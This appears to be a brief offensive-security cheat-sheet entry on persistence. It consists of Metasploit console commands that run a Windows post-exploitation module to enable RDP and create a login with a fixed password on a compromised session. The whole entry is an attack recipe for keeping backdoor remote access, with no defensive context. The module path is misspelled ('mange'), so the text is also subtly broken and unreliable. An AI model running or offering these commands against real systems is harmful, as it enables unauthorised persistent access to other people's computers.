Persistence

Using Metasploit

use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1
exploit

Last updated